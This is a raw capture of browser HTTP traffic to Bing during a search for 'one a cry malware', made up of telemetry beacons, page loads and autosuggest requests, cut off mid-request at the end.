GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1729199026520%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221152.0000000018626%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1729199026524%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%222711.0000000102445%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1729199026524%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026661%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1

HTTP Response

200

HTTP Request

GET https://www.bing.com/ipv6test/test?FORM=MONITR

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0

HTTP Request

GET https://www.bing.com/th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=125258D7D1334F6085405077EDD48B89&ID=SERP,6260.1&url=%2Fsearch%3Fq%3Done%2Ba%2Bcry%2Bmalware%26FORM%3DAWRE

HTTP Request

POST https://www.bing.com/fd/ls/ls.gif?IG=125258D7D1334F6085405077EDD48B89&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1729199028598}&log=UserEvent

HTTP Request

GET https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:27,%22BC%22:338,%22SE%22:-1,%22TC%22:-1,%22H%22:495,%22BP%22:498,%22CT%22:499,%22IL%22:9},%22ad%22:[-1,-1,1263,601,1263,3732,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199029282%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%2250%22%2C%22Downlink%22%3A%2210%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1729199029283%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1729199029296%2C%22Name%22%3A506%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029296%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029298%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029298%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]

HTTP Response

200

HTTP Response

200

HTTP Response

204

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2217%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

HTTP Request

GET https://www.bing.com/images/sbi?mmasync=1&ig=B7E570A9AE8C45A28F4A27F1C0C7A0D7&iid=.5098&ptn=Web&ep=0&iconpl=1

HTTP Response

200

HTTP Request

POST https://www.bing.com/rewardsapp/ncheader?ver=50503842&IID=SERP.5055&IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029301%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029303%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029309%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029316%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029316%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029316%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029317%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029317%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1729199029317%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029320%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029320%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22correlationId%22%3A%2267117bb59e794115ad134ed831df8820%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1729199029762%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267117bb59e794115ad134ed831df8820%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1729199029762%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Time%22%3A1184%2C%22time%22%3A1186%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1729199029784%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1187%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199029785%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1188%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199029786%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

POST https://www.bing.com/rewardsapp/reportActivity?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&IID=SERP.5064&q=one+a+cry+malware&FORM=AWRE

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fbtoptu%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fbtoptd%22}]

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?BF=MSJ1&IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}]

HTTP Request

GET https://www.bing.com/fd/ls/l?BF=MSJ0&IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}]

HTTP Request

GET https://www.bing.com/wiki?hash=3DA89B68261078C11D1C&order=1%2c2%2c3%2c4%2c5%2c6%2c7&width=608&open=0&accId=TopWikiRichCardV2&appNS=SERP&containsHeroSection=True&bgIndex=17%2c7%2c9%2c12%2c16%2c1%2c3&sectionLines=7%2c8%2c5%2c8%2c5%2c5%2c5&answerID=5882&DataSource=DefaultProd&iid=SERP.5882&ig=B7E570A9AE8C45A28F4A27F1C0C7A0D7

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum24%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f24%22}]

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum10%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f10%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199029793%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199029793%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199029793%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029812%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1729199030032%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22wikiWidget%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1729199030118%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22wikiWidget%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030446%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030447%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199030487%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

HTTP Response

204

HTTP Request

GET https://www.bing.com/geolocation/write?isBlocked=true&sid=03D76D5C9A2B6ED61E1C78479BBC6F8B&clientsid=03D76D5C9A2B6ED61E1C78479BBC6F8B

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030491%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030491%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030491%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.PPT&DATA={%22S%22:546,%22E%22:1768,%22T%22:0,%22I%22:0,%22N%22:{},%22M%22:{}}&P=SERP&DA=DUBE01

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1729199030520%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22717.000000004191%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1729199030522%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221922.000000020489%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1729199030522%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030584%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.HoverLink%22%2C%22TS%22%3A1729199038141%2C%22Name%22%3A%22Hover%22%2C%22FID%22%3A%22Original%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&ID=SERP,5036.1&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3D68aa766c6fbccdc4JmltdHM9MTcyOTEyMzIwMCZpZ3VpZD0zMDM4YWQ3ZC00ZDRmLTZjOTMtMmIyNC1iODY2NGNkODZkYmUmaW5zaWQ9NTAzNg%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D3038ad7d-4d4f-6c93-2b24-b8664cd86dbe%26u%3Da1L3Nob3A_cT1vbmUrYStjcnkrbWFsd2FyZSZGT1JNPVNIT1BUQg%26ntb%3D1

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199038836%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeClick%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199038891%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeClick%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22show%22}]

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22hide%22}]

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20malware&cp=17&csr=1&zis=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_fdb%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.SpSbInteract%22%2C%22TS%22%3A1729199047029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malware%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199047286%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malware%22%2C%22AsResponseLength%22%3A%22509%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199047386%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malware%2Cig%3A9A0886B345F64DB5A9243A661E142758%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199047408%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwar%2Ci%3A1%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199047955%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22sbox%22%3A%22typing%22%2C%22time%22%3A19358%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199047956%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20malwar&cp=16&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20malwa&cp=15&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20malw&cp=14&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20mal&cp=13&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwar%2Ci%3A1%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199047977%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwar%2Ci%3A1%22%2C%22AsResponseLength%22%3A%22508%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048074%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwar%2Ci%3A1%2Cig%3A95889F87F7E74E968DD87D7C89531C3E%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048075%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwa%2Ci%3A2%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048528%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwa%2Ci%3A2%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048549%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malw%2Ci%3A3%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048585%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malw%2Ci%3A3%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048608%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20mal%2Ci%3A4%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048621%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20mal%2Ci%3A4%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048641%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwa%2Ci%3A2%22%2C%22AsResponseLength%22%3A%